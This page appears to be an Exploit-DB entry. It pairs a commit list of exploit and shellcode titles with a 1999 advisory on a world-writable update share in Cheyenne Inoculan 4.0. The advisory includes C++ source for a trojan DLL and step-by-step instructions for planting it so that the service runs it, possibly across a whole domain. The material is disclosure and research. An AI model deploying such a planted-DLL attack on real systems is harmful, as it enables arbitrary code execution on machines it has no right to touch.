880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
57 lines
No EOL
2.7 KiB
C++
57 lines
No EOL
2.7 KiB
C++
source: https://www.securityfocus.com/bid/106/info
|
|
|
|
It is possible to run arbitrary code on any Intel machine running Cheyenne Inoculan version 4.0 for Windows NT prior to SP2.
|
|
|
|
Inoculan runs as a service, called "Cheyenne InocuLAN Anti-Virus Server".
|
|
When it starts, it replaces any shared directory with the same name and shares "CHEYUPD$" with full control for the everyone group.
|
|
|
|
When the service starts, it does an update check in this directory (usually "C:\Inoculan\Update\" ) using the files "<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and [idem]...\avh32dll.dll
|
|
|
|
Simply "touching" or modifying the file "filelist.txt" to look younger than real causes the update. Th update causes the service to stop, the avh32dll.dll DLL to replace the existing one (usually in
|
|
c:\inoculan\avh32dll.dll) and then starts the service again.
|
|
When the service starts, it loads the DLL into memory, and THEN does a lot of
|
|
stuff (including checking if it is a valid DLL, I presume).
|
|
|
|
You can write a DLL that executes arbitrary code at the time it
|
|
is loaded in memory, at the precise time when DllMain is called by the image loader, before any other function have a chance to be called.
|
|
|
|
To check if you are vulnerable, if you have the resource kit installed, run
|
|
|
|
SRVCHECK.EXE \\<YourMachine>
|
|
|
|
else run srvmgr.exe from a NT server on the same domain, select <YourMachine> and select "Computer|Shared Directories".
|
|
|
|
If there is a shared directory called "CHEYUPD$" that allows "FULL CONTROL" to the "EVERYONE" group, you are vulnerable.
|
|
|
|
An interesting point is that Inoculan uses "domains". In one domain, a single server forwards the updates to all machines participating in that "domain" (nothing to do with NT domains). It may be possible to write the trojan DLL to the domain's server CHEYUPD$ shared directory, and have it copy it to all the machines in the domain.
|
|
|
|
inoctroj.cpp:
|
|
-------Cut here -----------
|
|
#include "stdio.h"
|
|
|
|
long __stdcall DllMain (long, unsigned long, void*)
|
|
{
|
|
// Any code can goes here. This is an exemple
|
|
// What it does is simply create a file on C: drive root directory
|
|
// and writing "hello world !" inside of it
|
|
FILE * demo;
|
|
|
|
// create a file
|
|
demo = fopen ( "C:\\I_can_write_a_file.txt", "w");
|
|
|
|
// write to the file
|
|
char * buf = "hello world ! ";
|
|
fwrite ( buf,1, 15, demo);
|
|
fclose ( demo );
|
|
|
|
// This aborts the DLL loading. Anyway, we're done at that time ;))
|
|
return 0;
|
|
}
|
|
|
|
-------Cut here -----------
|
|
|
|
Compile and link to make the target avh32dll.dll. Write it to
|
|
<NtBox>\CHEYUPD$\English\NtIntel\Ready\, touch
|
|
<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt to be newer
|
|
that it currently is. Wait for the user to stop and restart the InnocuLAN
|
|
server, or for them to reboot. |